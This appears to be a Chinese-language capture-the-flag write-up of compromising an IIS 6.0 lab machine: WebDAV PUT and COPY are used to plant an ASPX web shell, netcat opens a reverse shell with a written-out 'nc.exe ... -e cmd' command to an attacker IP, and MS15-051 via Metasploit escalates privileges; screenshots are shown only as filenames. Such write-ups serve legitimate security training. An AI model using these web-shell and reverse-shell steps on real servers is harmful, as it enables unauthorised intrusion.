Granny-Writeup

概述 (Overview)

Author: 0x584A

73686134.png

攻击链 (Kiillchain)

33830856.png

TTPs (Tactics, Techniques & Procedures)

阶段1:枚举

通过nmap扫描,脚本识别提示存在很多类型的 methods。Web服务中间件是 iis 6.0

74920786.png

浏览器访问显示为一个默认的提示信息页面,没多大利用的可能性。

73842478.png

看一眼 AutoRecon 的提示信息,WebDAV is enabled

74653629.png

74993238.png

阶段2:工具及利用

74691965.png

阶段2.1:PUT文件上传

尝试利用 PUT 请求上传内容,发现txt是成功的但是不能直接上传asp、aspx脚本类文件。

74783131.png

查下是否存在可利用的 exploit:

76255509.png

有一个 41738.py 的脚本,从代码的描述中查看它是用来弹计算器的… 放弃..

78248867.png

阶段2.2:COPY脚本文件

找到微软的开发文档,在 WebDAV Methods 中找可利用的类型,发现很多可以用于本次攻击(我这里用的COPY)。

https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142816(v=exchg.65)

先将 shell.aspx 的内容上传成功txt的文本文件,然后通过 copy 动作将服务器上的shell.txt,复制成shell.aspx的新文件。

81032069.png

王德发?为毛会失败?

有仔细看了下手册,艹,写反了…

81378263.png

这里提示404是因为shell脚本里验证了来源IP,将我们的IP在脚本里加上再上传即可。

81512318.png

81521692.png

81960921.png

阶段2.3:NC反连上线

上传 netcat 反弹一个会话shell至kali。

82160896.png

先搜一下 netcat 的绝对路径。

82454018.png

反连:c:\Inetpub\wwwroot\nc.exe 10.10.16.4 9900 -e cmd

82524197.png

阶段3:权限提升

我这里用的 msf 的 local_exploit_suggester module,最终用 MS15-051 成功提权。

83200469.png

83231881.png

85624908.png

85968529.png

86017569.png

86246426.png

参考


版权声明

除非另有说明,本网站上的内容均根据 Creative Commons Attribution-ShareAlike License 4.0 International (CC BY-SA 4.0) 获得许可。